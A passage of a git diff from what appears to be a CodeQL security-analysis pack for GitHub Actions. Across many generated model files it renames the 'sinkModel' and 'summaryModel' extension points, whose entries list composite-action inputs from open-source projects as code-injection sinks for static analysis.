"input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a7..fc3870d89a8e 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d94..1d621562771e 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a2..f09b364127e6 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a3..56e7b8142316 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0d..9f953b32ab17 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd4..257b77bc2c34 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e0..49f2f86907f9 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b65..1e33c5e540aa 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b43..cfbf15549c48 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae41..24730af3d77a 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed1603..6be5abd09dd7 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c4..145b6f0d0e3e 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb8..c8b05bfd904b 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7e..04c218a76c1b 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de4..5447d4b7e2ed 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aeff..825ce27511d7 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59ed..8f3e49c9768a 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d1760513..1937367debc7 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b787..01b77b7ccc6d 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83feb..edbd28d401bf 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae3049..4b31bd66c5a6 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b4482695..a186fa070b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bddeb..92ee2971e3a2 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd7..07b8e96bfe29 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd0014586..2a2a5baab45d 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a90..274fab01e921 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc17..3671de9e58af 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a34784..2ef34dac8ba7 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c25..d76f20031e7e 100644 
--- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baaa..eccb5dae2bd7 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e6..3cbd3330ccd1 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf68..73c9c1f24a2b 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ffb..90c4f699308a 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e82..ed4e8820c998 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d167..df51b9fe4c84 100644 
--- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d5..8fca8591ceb6 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e4241..819728cf7187 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d5..d3eaca780b40 100644 
--- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8f..42c00ea216b4 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b7..a93d6a039d43 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9c..8a7784a6f01e 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3b..1b22d43bfad8 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b840..7175dd9450b4 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c69830..dca0f00a4ec8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f44..5f75d4fd0cd2 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc485..d34a6a1a3885 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc5..b7c5f7e214c1 100644 
--- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68de..eead3b5ace31 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd4061..be7043cfdbfc 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] 
